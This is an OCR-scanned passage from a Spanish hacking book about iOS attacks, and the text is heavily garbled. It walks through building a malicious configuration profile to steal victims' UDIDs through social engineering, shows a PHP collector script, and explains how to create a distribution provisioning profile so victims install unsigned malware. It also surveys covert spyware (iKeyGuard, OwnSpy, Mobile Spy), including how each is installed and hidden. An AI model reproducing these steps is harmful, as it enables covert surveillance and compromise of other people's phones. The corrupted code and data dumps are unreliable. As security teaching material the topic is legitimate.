Imagen  Perfil  de  coníiguracióil  iproJifÉ^mohjierotffig)  creado  partí  scjlicitar  el  UDID  a  un  dispcFfiitívD  iOS, 


Fste  perfil  ha  sido  creado  maiiualmcTilc,  es  decir,  con  cualquier  editor  de  texto,  como  por  ejemplo 
Ultf  úEdiU  NotePad,  y  un  largo  etcétera.  En  este  perfil  se  solicita  a  un  dispositivo  iOS  el  UDID,  el 
nviEl,  el  rCCTD,  la  VERSION  y  el  PRODUCT  (un  iPhof^e  3GS  devuelve  ¿Fhone  2JX  aunque  en 
realidad  únicamente  es  necesario  conocer  el  UDíD,  se  solicita  más  información  ya  que  es  posible 
hacerlo  y  no  supone  ningún  trabajo  adicional,  y  también  a  modo  de  ejemplo  de  posibles  datos  a 
solícíter  a  un  dispositivo. 

Una  vez  que  se  ha  creado  el  perfil  que  solícita  los  datos  deseados,  habría  que  subirlo  a  alguna  web 
para  que  las  victimas  tuviesen  fácil  acceso,  utilizando  alguna  técnica  de  ingeniería  social,  tal  y  como 
se  ha  coiTienladu  anteriormente,  de  manera  que  cuando  la  víctima  instalase  dicho  perfil  malicioso 
en  su  disposílivo  ¿OS,  los  dalos  soliciiados  por  dicho  peiiil  se  enviasen  al  senndor  en  donde  está 
alojado  el  perfil  malicioso,  y  se  persistiesen  en  él  de  alguna  manera,  Para  conseguir  esta  tarea,  hay 
que  montar  algunos  ficheros  en  el  serv'ídor  malicioso. 

En  ia  imagen  que  se  muestra  a  continuación  es  posible  apreciar  una  captura,  en  la  que  aparece  la 
arquitectura  o  ios  diferentes  ficheros  que  conforman  la  aplicación  web  o  servidor,  que  mantendrán 
público  el  perfil  malicioso,  y  recogerán  los  datos  de  las  víctimas  que  lo  instaleii.  Están  alojados  en 
la  caipeta  hidocs: 
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MAMP.n^pp 

Q  iDSTTuJware 

]  .as_Stcn'e 

^  bin 

■  .ns_?itore 

¿  proflle.mobiteconílg 

^  indt^x.nhp 

^  cgá-bin 

1. 

^  .DS^Stiare 

^  miif 

E]  dai¡i.ü(i: 

LJ  rib 

.=^  l64_l£>cio.jiíg 

S  htdocs: 

br 

jr  ifuígx.phip 

ht£  GC£_bá.^kup 

► 

tf  rftfleve.php 

^  MhsTjnfy 

► 

Uu  tlc^nc&s 

► 

iogs 

■h 

tnnp 

t- 

■  .DS_5Trinp 

linn 

É  L£AMLr^ 

g  MFSWltrH.itf 

^  USEZ-MDJ..-tf 

S  RtAUMfc.ftí 

S  npcHTM.ríí 

a 

B  Mamp  Control. vvdgt 

Imagen  07*29:  Aspccio  de  la  aplicatíión  web  que  lecoge  los  dahos  He  un  dÍF;posít¡vo  iOS. 


El  primer  archivo  a  comentar  cíí  c!  index.php^  que  es  el  encargado  de  presentar  el  perfi  I  al  usuario  que 
acceda  a  la  web,  que  se  puede  programar  según  los  eoíiociinleiitos  que  se  posean  de  PUP,  y  acorde 
a  la  Lcciiica  de  ingeniería  social  utilizada  para  engañar  a  la  víctima.  En  es  Le  caso  y  como  POC  se 
pi^esenta  algo  sencillo^  se  muestra  a  continuación: 

Informática  64 

WWW  j  n  format  tea  64.  co  m 

In  onier  lo  ^nllgiiri  praílls  aarvics  feucnutully;  yüü  toMSi  accefit  th#  fofltfwirfnfl  proflle  tetallBtlon; 

aia^feOS  Frofrla 

H  y'j'j  císn  ÜBb  aitii,  yuLir  ar«  in  a  resfcictid  anea,  or  Bsc^siria  Oi'  VPN  connecfon,  finri  yrajf  híwl  wm  nel  up  succoísíui'y  li  ofder  b  ír-BÜI  Üia  pKJÍía.  elicfc  on  l|is 

biypiirtnik  and  acca&t  bstaílaíon  ^  it»  corpamti^'e  lOS  pn&íils 

Sír^er  nsF^i  InrealhMr. 

Dsíumant-fíoot  /Ap^^Li  c  ntinníi  /k whí  f  fltdtic  a 
FIMj:  pTTíjf'i  l.Ei^nilí.iq' 

Thb  paga  in:  £ngl.^  _ _ 

Tniager  07.3(1:  Aspecto  del  lnd^..php  dcl  servidor  que  aloja  el  perfil  luliIÍcíoso. 

Hay  que  convencer  a  la  víctima  de  que  haga  cHc  en  hwtáíl  iOSProjlíe  e  instale  dicho  perfil  malicioso, 
que  permitirá  al  hacker  obtener  el  UDID  de  la  víctima,  por  lo  que  la  calidad  de  la  w'eb  y  del  éJigaño 
irán  en  proporción  con  el  n  limero  de  víctimas* 

Además  de  alojar  los  ficheros  necesarios  para  dar  aspecto  a  la  web,  y  hacer  creíble  ei  engaño,  ya  sean 
de  imágenes,  de  estilos,  etcétera,  y  el  propio  perfil  malicioso  que  se  ha  creado  anterioiiTiente  (fichero 
profik.mohúp.conjíg'u  necesario  un  fichero,  que  contenga  el  código  necesarií)  para  lecoger  y 
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pej'sistír  los  datos  enviados  poi  Ins  víctimas.  En  este  caso  es  el  fichero  reírle ve.php,  el  que  se  encarga 
de  dicha  tarea.  A  continuación  se  muestra  el  código^  que  como  se  puede  apreciar  es  muy  simple: 

__ 

Sdota  ü.  flls_g£t_contefitsC'pÍT|5://íiT(Hiít‘>' 
f i  1  t&fit  s  C  ^áatú .  tict  “ ,  í4cTtd^ ; 

hetííerC “Lí>cottor>;  Uttp :  //l^iZ « 1^  *  59 :  M$^losiíWflwQrfl/retrtev*?íSiit-ti=" .  rawurlenc-tuleCiíiotíi)) ; 

H _ 

Tiraj^n  OT-Sl :  Aspado  rfel  coligo  ■implemeiiüadfi  en  el  fidiero 

Eli  el  anteriDr  código,  se  está  recibiendo  lo  que  el  dispositivo  íOS  envía  al  servidor,  y  se  está 
almacenando  en  el  fichero  düfaJxí,  además  se  está  haciendo  tma  rediieccíóoj  de  niaiiera  que  se 
aprecie  en  la  pantalla  del  dispositivo  lo  que  se  está  enviando  al  servidor,  auuqne  lógicamente,  esto 
solo  para  ver  los  resultados  de  la  PoC  Y  es  ahí  donde  tiene  sentido  el  fichero  mdex.php  de  la  carpeta 
reírieve,  que  lo  único  que  iiace  es  un  echo  por  pantalla  de  lo  que  le  llega  por  parámetro,  y  así  mostiar 
los  datos  que  envía  el  d¡spt>silivo,  nada  más  instalar  el  perfil. 

En  im  caso  de  hacking  real,  bastaría  con  redireccionar  al  usnario  a  nna  nueva  págitia  web  en  la  que 
se  le  indique  que  la  instalación  del  ceitiñcado  ha  tenido  éxito,  o  la  intonnacióii  peitiiiente  en  cada 
caso,  según  el  engaño. 

Para  que  esta  pequeña  intraestructura  tenga  éxitO;  el  perfil  debe  apuntar  a  dicha  web,  y  al  fichero 
relrteve.php.  para  que  los  datos  queden  conectamente  almacenados  en  e!  servddon  Si  se  obseiva  la 
imageu  06.28,  en  la  que  aparece  el  perfil  malicioso,  se  apunta  hada  una  URL  ctmcrcLa.  que  en  este 
caso  apunta  al  senddor  local  de  pruebas,  que  es  hnp://!úca!host:S388/re!riei'^^^^^ 

Instalación  del  Perfil  de  Configuración  que  roba  IJÜIÜ 

Como  se  ha  descrito  anlerionnciitc,  la  idea  es  subir  el  perfil  malicioso  a  una  web  de  libre  acceso,  y 
con  un  poco  de  ingeniería  social,  conseguir  que  la  víctima  lo  instale,  de  manera  que  el  dispositivo 
envíe  el  ansiado  UDID  al  seivñdor  malicioso  que  el  hacker  o  atacante  tiene  montado.  En  el  senador 
se  recibiría  la  información  solicitada  en  el  perfil,  y  se  alniacenaiía  en  un  fichero  o  en  una  base  de 
datos  A  continuación  se  van  a  presentar  los  pasos  que  realizaría  el  u  su  a  rio/ víctima  para  instalar 
dicho  perfil. 

Lo  pi’iniero  es  cargar  la  web  en  la  que  se  encuentra  publicado  ei  perfil  del  atacante  que  recopilará 
iri formación  sobre  el  dispositivo,  es  decir,  habría  que  darle  la  URÍ.  a  la  víctima  y  convencerla  de 
que  acceda  e  instale  el  perfil.  Una  vez  que  ia  víctima  hace  clic  en  el  perfil  en  el  servidor  malicioso, 
aparece  el  perfil  en  el  propio  dispositivo,  y  entonces  el  usuaiio  debe  indicar  que  desea  instalarlo,  tal 
y  como  se  muestra  ec  la  siguiente  captura: 


ISO 
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t^^  gjüM 12:31 


cftnEeflfu  Instalar  p&rfii 


-m 


i64  ProfDe  Service 

lnf(nrrTiní’r.ríft4 

Sin  firmar 


Deacrf pclán  TTila  teTipo^  profi  le  will  be 
iJSDd  tq  find  Eind  ^íspby  your 
uüírBnl  ddviay'!;i  UDID. 

RíCíbldo  1íjí'í>1/í5013 

Contiene  Oorr  probación  pare  le 

actl'jaciórí  del  en  el 

dispositivo 


Más  detalles 


ÍTnageii  07.32:  Deí-plegaiido  perfil  en  un  iPhone. 


Además,  el  perfil  en  este  caso  está  sin  firmar,  lo  que  coinplicana  d  cngafio,  ya  que  puede  hacer 
desconfiar  al  usuaiio  de  que  lo  instale^  aunque  esto  se  puede  remediar  firmando  dicho  perfil  con  un 
certificado  válido. 


Una  vez  que  se  pulsa  el  betón  Imtalar,  lo  primero  que  pide  es  el  passeode,  y  póster  tormente  se 
muestiaii  los  datos  que  está  enviando  el  propio  dispositivo  en  la  pantalla,  tal  y  como  se  aprecia  en 
las  si^LiicTilcs  captums: 


IrriLigen  07.33;  In^jlul lindo  el  pedií  que  i'ecaba  diitos  del  ri  impositivo. 
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En  este  caso  y  como  pmeba  de  concepto,  se  realiza  de  la  manera  más  sencilla,  por  lo  que  simplemente 
se  guarda  la  respuesta  del  iPhone  en  un  fichero  Jxi^  que  tiene  el  siguiente  aspecto: 


tABÁl 

3  +ei  *ÜHÜ'' 

l'ÁlAtB'cTxml  veraÍEín=”l.fl”  entuiJiní(=‘'UTF-B"T3‘ 

CÜOCTYPE  plist  PUBLIC  PLIST  ‘  hrttpi //fcvu.  apple .  cdn/ÓTOs/P -ape rtyList-l.  0 . dtd“> 

•zplLst  wí  rsj.crr=''lja^'sr 

<dict> 

<key>IHEI</kByí 

<strlr3s.fll  765^^^  373141  S</3trlrig> 

í  keys-PaDD  UCT</keyi 

<s  t  rirtgs-iPho  n  c3  j  l</5 1  riri9> 

«keys^UOID^/key? 

77b3f st  ring  ^ 

^key^v  E  RS  im</key:> 

■^S  t  rln  g>S  3Zfl  i</ E  t  r  i  ia> 

<JÁ  ÍCt> 

íí 

r0cü«c\t 

fcffVTT- 

-Grtü' 

0Z1 

B  ULJ^ieU 

Apple  Lnc.itiU 

Apple  iPhonel  BU  Apple  lí^tione  Device  CAB 
1301101036152 

IB  0  H0 103  5lii  i0  AÉ  L^0+Uí  C/ 1 7  A2Ó  L^  ^AF-42  5  3-5  irlO-  168fl!í3  2  Z«  FSfl  l 

0  UU51 

0  UCAIBU  CupertlnalBLI 

Apple  iTiCnilB 
U 

iPnaneBAüB 

J-ÜilO- 

Ag  0ÍU  AAá3  SI 'tEjFa .  o  F  ií  zl 

*¿L  ■  EFÍJeí  0  *  ftr  á  g*5 1  A- tt  í  t ' « J .  $  1 5  í  ü 

a2-A,4:¿Ví4jT 

l^Slí-fl¡f»dt^iüsjIaás:OÜ,É6'I**ZÚffq£Ai0áí0UJraJl-t^  E#ÍMJí jy ■A&*'ií«L¿1‘eül -ü;7#5"’'JE  ZbIKíSLA 
U’BBL'tl  U3s'0++0 
-iCiü^rd 

0 

’íÜHfl- 

WVWI-  iV0vrf*&kA_pítitf|llF£Fá''le-0t-Mn,Qu(rj(EH8o"ái(^_U^Ff!^Fé''ff5*'.T  ^7ttzÚhnl^*  9  [17 ?X£f«lítú47r7ÍJA  aA'lwSVfitfi»' 

VühD- 

ayl 

0  uusieu 

Apple  Inc.ln&BSU 

Apple  Certíflcatten  Aurhoriiyl-B+UWPle^  iPtiSPC  Certlílcatlcn  AuthorltyB 
O704I622S44G2 
14 0416225 44 6 Z0ZI 
0  UÜS10Ü 

Apple  Inc,10J 

Apple  IPhanelfiyApple  IPhone  Onice  CABAüB 

4.{jHLÍ‘'  •  - 

At0AiAAúlJ„ij'2  Á4HWJTÍY T A¿| tÓGJ:llaíí*J sT±A " o 6 1 

UfiaÑÉ  IRe  ■  IJifÁ*  2-^ jtíEl  kibNRl  Z  5  Y£\  01 Q  t .  U  S*  L  Fó^  naw  E  /gX  » 

BYnlO‘«iiy*flLJTcT!% 

aiAütí Aófl  Ü  *  U  0  U "e '  0L  fi .  E  íMiJ  aA!^¿s  í 8  LétBUíBMA*.  -fi  3"  kViflwÍLJi/  It  1 500  LJ10/  0-t + 1 )  0  ^  h  t  tp : //W .  app  l  e .  f OR/  app  I  eca/  i  pfton  e-  c  rlO 

_ iM: _ _ _ _ _ 1 

Iiiiageti  0?.:14:  Ficlieivi  qje  almacena  la  respuesta  de  un  dispositivo  iOi.9  al  instalar  el  perfll  malicioso. 


En  la  captura  de  este  ñcherOj  es  posible  apreciar  como  el  dispositivo  iOS,  (que  en  este  caso  es  un 
íPhone  4),  ha  enviado  la  información  que  el  perfil  solicitaba,  y  por  tanto  se  podría  decir  que  ha 
finalizado  la  parte  de  adquisición  o  robu  del  UDTD.  Con  esto  el  atacante  se  encuentra  en  disposición 
de  pasar  a  la  siguiente  fase  del  ataque,  que  sería  la  creación  de  un  perfil  de  distribudón  para  que  la 
víctima  pueda  instalar  el  maíware  del  atacante,  ya  que  sin  dicho  perfil,  no  es  posible  la  instalación  de 
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software  sin  firmar  en  el  dispusiüvo,  tal  y  como  se  presentó  en  el  apartado  Tmyaiws  con  Províslonlng 
Pi-ofiles. 

Creación  del  per  til  de  distribución 

Para  crear  un  perfil  de  distribución,  y  que  las  victmias  puedan  instalar  el  software,  se  recuerda  que 
el  malware  no  está  firmado  por  Apple,  es  necesaiio  dirigirse  a  la  web  de  iOS  Pmvisiomng  Portal, 
que  se  puede  encontrar  en  la  dirección  estehiecida  para  desairó lladoies  de  Apple,  Ja  cual  es  lOS  De.v 
Center: 


iOS  Developer  Program 

ios  PrcwisFonIrp  PoitaJ 

0 

íTunes  Connecl 

o 

Apple  Dcvdoper  Forums 

0 

Dcwlpppr  Support  Gente  r 

0 

J musen  0735:  íi  tOS  P^ovi^iúnin^^  Poriúi,  situado  CO  iO.S  D^y-C£iU€}\ 

Una  vez  en  el  home  de  iOS  Provmamng Porta!,  en  la  parte  de  la  izquierda  íaay  un  panel  que  contiene 
un  menú  de  opciones,  en  dicho  menú  se  encuentra  la  sección  de  ceitificados  por  donde  hay  que 
comenzar; 


Imagen  07  Ifi:  Menú  de  iOS Provísioíimg Pori¿rt, 

En  la  sección  de  certificados  se  puede  encontrar  una  pestaña  How  To,  en  donde  hay  información 
detallada  de  cómo  crear  los  certificados.  Hay  que  crear  un  cerrificado  CSR  (Ccniftcaie  Stgñing 
Request)  con  la  aplicación  KeychaiJi  para  luego  añadirlo  o  enviarlo  a  la  sección  de  certificados  de 
iOS  Frovlskming  Porta!, 

Para  crear  el  CSR  hay  que  ii  al  menú  principa)  de  la  aplicación  Keychain,  en  Acceso  a  Llaveros  > 
Asistente  para  certfficúdos  >  SoUcünr  un  ceníjlcado  de  una  autoridad  de  ceni/tcación,  y  aparecerá 
uTi  cuadro  de  diálogo  como  el  siguiente: 
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 ■■.. 

^formacldn  del  cenifkado 

Intraduzcü  informado n  para  Lertilic^da  qiic::  c^tá  ^golicitandci. 

Haga  clic  en  continuar  para  solicitar  un  certificado  la  CA. 

□trsídqn  dt  corrí  o  de:  wuario-  ¡  Jnae  ua^-Q#!  rttormaTmS4ximi  |  t  | 
Hoirdare  camun .  [^jitanr^  Aguay^^ncíülT*^™  ~  ^ 
iHrwrrin  de  tofreo  de  la  ■LA-  | 

palera  ckve:  Q  envd  per  correo  clecrránica  a  la  r4 
@  ^  gjjank  en  el  disco 

Fímiftírme  especificar  l¡k  Inforniftádíí 
^  del  parde  (laves 


[  Continuar  I 

I _ 

[magen  07.37:  Creando  un  CSR  con  Kcycham  para  enviarlo  ¿i  iOS  Pfovísiomfig  Foria!. 

Esto  genora  un  archivo  con  extensión  .certSignmgRequest,  que  se  debe  subir  ai  ptiriab  Al  cabo 
de  poco  tiempo^  es  aceptado,  y  así  el  Ceritficado  de  Dislribuckm  está  disponible  para  descargar  y 
ponerlo  a  buen  recaudo  en  c!  Keycham.  A  continuación  se  muestra  en  la  siguiente  captura: 


Imager  U7.3S:  Cerlificfldo  cte  disíriínuciói^  íli^potiible  para  descargarlo, 

Cuandí)  se  descarga,  se  aprecia  que  es  un  íichero  .cer,  como  se  puede  comprobar  en  la  siguiente 
captura:  _ 

Ha  elegida  abrir 
2]  ios_dístrH>utton,cer 
Cfue  eü  de  tipo:  ünaiy  ^le 
de:  http£:^7dcvr.ln|ier.appl^.rf:ini 

¿l  e  gustBKü  guardar  astfl  archivo? 

I  Canelar  j 


imagen  0739;  Descargando  el  certificado  de  disttibiioiüii. 
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Después  de  crear  este  certiñcadjü  CSR,  enviarlo,  que  sea  aceptado,  descargado  e  instalado,  hay  <iiic 
crear  fA  Perfil  de Dislribiíción,  para  el  cual  es  necesaiio  el  Certificado  de  Distf  ibuciófi  recién  creado. 
Hay  que  situarse  en  la  sección  Pmvisiojiing  >  Disiribifüon  >  New  Prqfílet  y  aparece  todo  lo  que  se 
necesita  para  completar  ia  creación  del  perfil,  tal  y  como  se  muestra  en  la  signiente  captura: 


C  reate  ÍOS  Dístributlon  Provisión  i  ng  Proflle 

G€iefaít&  prcvlsíojiíng  ewsIIIes  here.  MI  f  alds  ars  raquíred  unEess  oiherwise  ictec,  Ta  í^am  -nore,  visít  die  HqwTd  scctlon. 

DlstrEbinton  Meihod 

O  App  Stomí  @  Ad  Hoc 

Profflfl  Ham<ii 

[Enlef  a  pf^flEe  twii«  I 

Qistributiern  Certifícate 

luán  Miflijet  Aguayo  sanchos  f^xpírlng  on  Jan  27,  2014> 

App  ID 

[  Seí^  Aoc  10  ■  í  J 

Devices  (optional] 

Sel«ct  ifp  to  100  ckvkas  ípr  dlstributlnq  rhe  tnal  appllcailon:  ibe  final  applícatlon  wltl  run  only  on 
tbese  selectad  davices. 

seleci  A\l 

Q  Cnip  1  ronEcmib  itas  iPad  0'  Iphone  iC 

□  JüanH¡‘5  íPhonc 

TiKüifiOieTi  07.40:  AspciUo  íle  la  sección  para  crear  uí)  perril  de  aprovisionamicnio  para  distribución. 


En  esta  captura  se  puede  comprobar,  que  es  necesario  un  nombre  pam  el  ]3€rfii,  seleccionar  una  App 
ZD,  y  tener  añadidos  los  dispositivos  en  la  lista,  además  del  Certificado  de  Distribtídófi  que  se  ha 
creado  anteri cimiente  y  que  aparece  auLomátic amente. 


Para  averiguar  el  App  ID,  hay  que  consultar  el  fichero  ínfo.PUst  de  la  aplicación  o  malware 
desarrollado,  y  observar  el  campo  Bidndie  Identifier,  tal  y  como  se  aprecia  en  la  siguiente  captura: 


▼  Informaron  Property  List 

D]  rtforary 

(13  ittímij 

Loc^izjation  riattVB  deyelopment  reg 

String 

*n 

Bundie  disp^y  ^ome 

Strinq 

S|PRODUCT_MAMEÍ 

ExecLtabk  ñle 

S:rins 

SlEXECUTABLE_MAJ^iEi 

Bundie  ídentlfler 

String 

enm .  i  rífi3rm3r]í-afj4 . 5i{PRütJlK:  1  _NAM  t:  rfc  LO  34  ide  ntifi  erj 

Info  Dícti  0  nary  v«  rs  son 

String 

S,0  _ 

Bundle  ft^me 

Siring 

SÍPRODUC  r^NAMEÍ 

Bun&dlc  06  Type  code 

Siíing 

AFTL 

BürMfle  vers>ion^  ^horl 

String 

LO 

Hundí*  cre&tor  OS  Type  code 

String 

7f?? 

Bundle  versión 

Stríng 

1.a 

AppMcaiion  rtquirEs  IPlióíie  eriívlroni 

Booiaan 

Y£S 

^  de  Vire  ca  p^íhJlittes 

Arra^" 

Í1  Ítem) 

►  Sjpfíorted  snterfac*  orleniailDna 

Array 

[3  Ítems] 

Imagen  07,41:  Fichero  fnfn  tjhst.  con  el  ¡Iirndle  Iderr^^r. 
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Otra  opción  es  crear  un  App  ID  qne  ideiUirique  a  toda  un  conjunto  de  apps,  con  lo  que  una  vez  que 
se  consigue  que  una  víctima  se  Ínstale  el  de  Disíridudón,  podría  instalar  otras  apíicacíones  o 
ifialware  y  no  solo  el  malware  de  esta  PoC, 

Para  finalizai,  faltaría  añadir  los  dispositivos  víctimas  a  la  lisia  de  dispositivos  del  porLal,  para  poder 
crear  el  perfil  para  dichos  dispositivos  en  concreto.  Fs  aquí  donde  entran  enjuego  los  UDID  robados 
con  el  perfil  de  Configuración.  Habría  que  situarse  en  la  sección  Device  >  Aíanage  >  Add Devices^ 
y  aparece  una  cuadro  como  el  siguiente; 

l>etfice  E>e¥ice  ID  {40  hex  chatratcterG) 

iProre^-Vlctiiñl  — -  ,  ^  H  E 


Imagen  07.42:  AñariienHo  ai  spnfvitívos  al  partal  He  desartollo  áí:  iOS. 

En  donde  se  pueden  introducir  los  nombres  de  dispositivo^  y  sus  respectivos  LDID,  que  se  deseen, 
hasta  un  máximo  de  100  con  la  licencia  de  desaiToüador. 


Con  este  paso,  ya  se  tiene  todo  lo  necesario  para  crear  el  Cenifícaclo  de  Didribiwión,  así  que  basta 
con  hacer  clic  en  el  botón  Submit^  y  el  certificado  aparecerá  como  Pefídmg^A^l  y  como  se  puede 
apreciar  en  al  siguiente  captura: 


^  Distfibution  Provlslanlng  Profiles 


PiTErflIe 

*  App  ID 

Status 

Actlons 

D 

^  i6l  Cloaed  Sela 

vaiiA'iizí^tiT 

Eypired 

D 

f_  lOI  CrllríiÜ  UptíiEl! 

WÜA.‘«JZ7PC.- 

PerMíiíva 

-  --  :  - 

■  *  ---  ^^£iüSr 

Imagen  07.43:  Certücado  en  estado  Feiíiíing^  una  vez  se  ha  hecho  la  solicitud. 


AI  poco  tiempOj  el  certificado  estará  en  estado  Acítve,  y  podrá  ser  descargado  para  ser  utilizado  con 
aquellos  dispositivos  para  los  que  se  creó,  como  se  puede  apreciar  a  continuación: 

^  Dlstrlbiitlon  Provlsionlng  ProfUis  J 


□  fVcnrjsiuntrig  PrufílE 

A  A;»[>  ID 

St¿£us 

ACUDIA 

Q  ^  Ífi4  ClosEC  Eeti 

V7JANLJlZ7rc,’ 

:£Jípined 

W  ¿05  Crlirciil  Lpdarp 

V2ÍÍAHLE7PC." 

ACÜ^'B 

Edil 

Imagen  07.44:  CeFlifieado  en  Acfivi^^  listo  paju  dtístargary  ser  utilizado. 


Una  vez  que  se  tiene  el  Ceriificada  de  Dístnlmción  y  el  Jpa  o  fichero  resultante  tras  programar  el 
muiware  deseado,  solo  falla  insLakrlu  en  algún  dispositivo,  lo  que  se  puede  hacer  a  través  de  ITitnes. 
Esto  se  aprecia  en  la  siguiente  gráfica  que  representa  los  pasos  a  seguir  por  tos  testea dores  de  apps'. 


1S6 


HacPJn¡^  ¿iii  díspos'ltívihs  IOS:  íPad 


IfnaEíen  <)7.45:  Pasos  a  seguir  por  los  testers  de  apps  éii  iOS. 


Otra  opción  es  utilizar  el  entorno  de  d^arrollo  para  realizar  la  instalación,  ya  cjue  basta  con  arrastrar 
el  ceitiíicado  al  icono  del  Xcode,  y  se  podrá  realizar  la  instalación  en  el  dispositivo,  como  si  se 
tratase  de  un  testen  más  de  desarrollo^  una  vez  este  Xíjndé'  levantado  y  el  dispositivo  conectado  y 
desbloqueado. 


4.  Troyanos  con  Jaílbreak 

Como  se  ha  presentado  a  lo  largo  de  este  capitulo,  1a  barrera  entre  el  fm/warét  y  el  usuario  final  es  la 
App  Store,  pero  en  caso  de  que  el  terminal  tenga  J¿7¡/¿7ma/c,  se  pueden  instalar  apps  de  otras  íuentes 
o  rejjQSÍtoiios  no  oficiales,  y  por  Lauto  no  firiuadas  j)or  Apple.  Por  esta  razótj,  es  posible  encontrar 
muestras  de  nm/ware  en  Cydía  o  en  otros  repositorios.  A  continuación  se  presentan  algunas  muestras 
de  ma/ware  y  troyanos  que  se  puedan  instalar  en  termiiiaies  con  Jaílbreak: 

jKeyCuard 

Disponible  en  Cydia  solo  para  terminales  con  Jaílbreak,  hace  las  funciones  de  un  keylogger  clásico, 
ejecutándose  discietamente  en  segundo  plano,  y  capturando  cada  pulsación  en  el  dispositivo. 
Puhl  i  citada  como  el  primer  keylogger  en  iOS  y  de  uso  profesional  para  controlar  a  los  empleados, 
es  la  herramienta  perfecta  para  capturar  información  confidencial  o  interesante  de  cara  a  un  ataque 
posterior. 

Se  accede  a  través  del  navegador  Safari,  con  la  URL  http:/y!oca¡host;4444/iogSy  y  se  puede  gestionar 
la  aplicación  a  través  de  iin  panel  web,  tal  y  como  se  puede  apreciar  cu  la  siguiente  captura: 
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Kicijsm 


^i 


icicaihosi:444^'toss 


Google 


Lfigs  ScttÉigs  BÜV  Lc^EHit 

iKeyGuard 

We.'come  to  the  Víieb  aciministratior  oí  th» 
iKeyGuard  key  tegger.  Tlhe  rncst  íeature-rlcK 
key  loggaf  fcn  rOevices- 

iK«yGu4irU  s  CLMreiüly  ENABLED 

KXiaLE^j'aFF 

Tip:  Ydu  ear  set  a  postiwcH'n  ín  thesotUi^üi. 

Logs 

H tafttftta a|J^ 


tS^nSIU 

EcicalliDst:4444/£etLing£  C  [  Guuyil»  ] 

Uigs  Bettlng^  BUY  Logoiit 

Settiiigs 

MaiKI}- 

Sending 

ñ'í'tluarcy: 

EDalivery 

rEiethod: 

jmaguayiii6fhfrMTrflticafi4.com  ! 

Qorf  OHaurly  ÜDaiíy  O 

Wísnldy  O  MonHily 

OSMTT  QfTP  OBnth 

Q  C\&dr  Jega  after  ssndlnf]  €- 
malí 

DEL  k)&v 
loggiog: 

Gnoo*  OLog  lOELl 

SMTP 

1^ 

G±  CQ  Ig 

Imagen  Ü7,46:  Aspeólo  del  pauél  de  eontral  de  iKeyGmmí. 


Se  puede  confígurar  el  envío  de  los  logs  con  las  pulsaciones  capturadas  por  correo  electrónico, 
utilizando  varios  métodos,  y  tainbién  se  puede  elegir  la  freeueneiíi  de  envío.  La  versión  gratuita  tiene 
muchas  limitaciones,  pero  existen  otias  dos  versiones  de  pago,  con  muchas  más  características  muy 
interesantes,  como  se  puede  comprobar  en  la  siguiente  tabla: 


Edltioiis  and  Faoturea 


íKeyGiraná  fSíEliia^ 

ttíeveuísfd  SUsíidard 

Pro 

HkHn^  CydtB  iax\ 

z 

Hidiiia  tm 

V 

/ 

Qiarectcf  Loggms 

y 

/ 

Auco-Coer«cxk)r< 

V 

✓ 

S«f%(in9  í-QQí  Via  EHHali 

/ 

/ 

V 

FTPUpiOiads 

SMS/iMesage  Logsi^rtg 

V 

V 

v" 

Phona  Cali  A£iivíry 

WhataApp  Lowing 

— 

✓ 

we&sii:«s  visíied  us^gin^ 

v' 

Openad  Appa  Logging 

_ 

y/ 

Imagen  07.47:  Tabla  comparíitive  4c  las  diferenues  versions  de  IK^yQuard. 


OwnSpy 

Esta  aplicación  es  un  troyano  que  permite,  monítorizar,  visualizar  y  en  general  espiar  p<3T  completo 
la  actividad  de  un  iPhom.  La  lista  de  funcionalidades  es  increíble,  aunque  depende  de  la  versión,  A 
continuación,  se  Tniieslran  las  funcionalidades  tal  y  como  aparecen  en  la  web  oficial  de  la  app: 
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GrQbodÓrd&Apps 

WhútsApp 

Apps  IretdackE 

^  Fotos 

Pl  Sw5y  iMessoge 

^t^stxrkáWeb 

9  L  ocQÜzod6n 

Zm  UsodeApps 

=n  htgtorlol  óe-  Ikmocíaa 

^  Exportar  datos 

Gcntoctos 

titerceptoción  de 
Uormdos 

¡Ü¡f  Destnstolocí^  remoto 

^  Uomodb  espío 

Audio  en  tírecto 

^  Cemeo 

£)  WhotsApp 

^  ^isoóíonñ  de  tedodo 

imagen  07 AH:  Funcional idades  del  troyaíio  Owfi^y^  en  sii  versión  Goíd  -¿j 

Lxisten  varias  versiones,  disponibles  en  Cydia^  en  el  repositorio  hnp://apLmodmyLcom^  aunque 
también  se  puede  encontrar  más  información  en  la  web  oficial  hnp://mvmpycom.tios_msí^^^ 
Rvidentemente,  para  instalarla  hace  falta  que  el  dispositivo  tenga  JaHhí^aJc^  tal  como  se  explica  en 
la  web  oficial: 


Imagen  ü7h49:  Proceso  de  instalación  de  íhvnSpy. 

Una  vez  instalada-  basta  con  registrar  el  dispos  ítiví),  y  se  podrá  controlar  desde  díclia  web.  Para 
finalizar,  conienlEir  que  incluso  seria  posible  ocultarel  ¡cono  de  Cydia,  para  que  el  Jailbi-eak  pase 
desapercibido. 


Mobile  Spy 

Public ítado  en  la  web  oficial  hftp:/Á%niM\Múbi¡eSpy.es^  como  software  para  espiar  dispositivos 
móviles,  permite  intervenir  en  secreto  desde  los  mensajes  o  corivers  ación  es  de  Whatsapp,  chats  de 
Fúcebook,  Twiner,  localización  GPS,  llamadas  de  teléfono,  mensajes  SMS,  fotos  y  vídeos,  histórico 
de  navegación,  lista  de  app^  instaladas,  e  incluso  bloquearlas. 

Esta  aplicación  solo  funciona  en  terminales  con  JaUbreak,  y  para  instalarla  es  necesario  añadir  en 
Cydia  el  siguiente  repositorio  http://md-ms.com/m.s'6d^  e  instalar  el  paquete  Core  Uíj¡ítie$^  que  es 
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un  paquete  con  otro  nombre  para  no  levantar  sospechas.  Una  vez  que  la  app  se  ha  instalado,  no 
lapaiece  ningíin  icono  en  ei  escritorio,  de  manera  que  para  poder  acceder  al  panel  de  control  de  la 
<57/7,  CK  nccesariij  marcar  *1 2.145  en  el  panel  de  llamada.  Una  vez  se  ha  realizado  dicha  marcación,  el 
¡í^ringboard  se  reinicia  y  es  entonces  cuando  aparece  el  icono  de  la  app,  con  el  nombre  Smemphone, 
j y  que  luce  el  siguiente  aspecto: 


*12345 

1 

2 

3 

4 

5 

6 

7 

8 

9 

* 

0 

# 

V* 

1** 

ImfigeE  Aüccdiundu  ul  panel  ele  Mobíle  Spy\ 


Jna  vez  que  se  ha  instalado,  y  accedido  ai  panel,  hay  que  loguearse  o  registrarse,  ya  sea  desde  el 
ropií}  dispúSÍLivo,  o  accediendo  a  la  parte  de  registrí)  en  la  web  oficial  https://w\vw.mobüespylog^^J 
